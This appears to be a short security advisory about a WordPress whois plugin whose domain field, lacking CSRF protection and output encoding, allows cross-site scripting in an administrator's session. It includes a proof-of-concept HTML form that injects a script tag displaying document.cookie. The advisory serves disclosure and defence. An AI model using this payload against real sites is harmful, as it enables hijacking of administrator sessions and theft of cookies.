Due to a lack of CSRF mitigation and entity encoding in
pages/func-whois.php, it is possible to execute scripts in the context of an admin user by including a script in the
domain field, via the query string or a POST field.
There is currently no official fix, the plugin has been removed from the WordPress plugin repository until the vendor provides a solution.
WordPress Exploit Framework Module
Proof of Concept
<form action="[url of page with the whois form]" method="post"> <input type="hidden" name="domain" value=""><script>alert(document.cookie)</script>"> <input type="submit" value="Submit"> </form>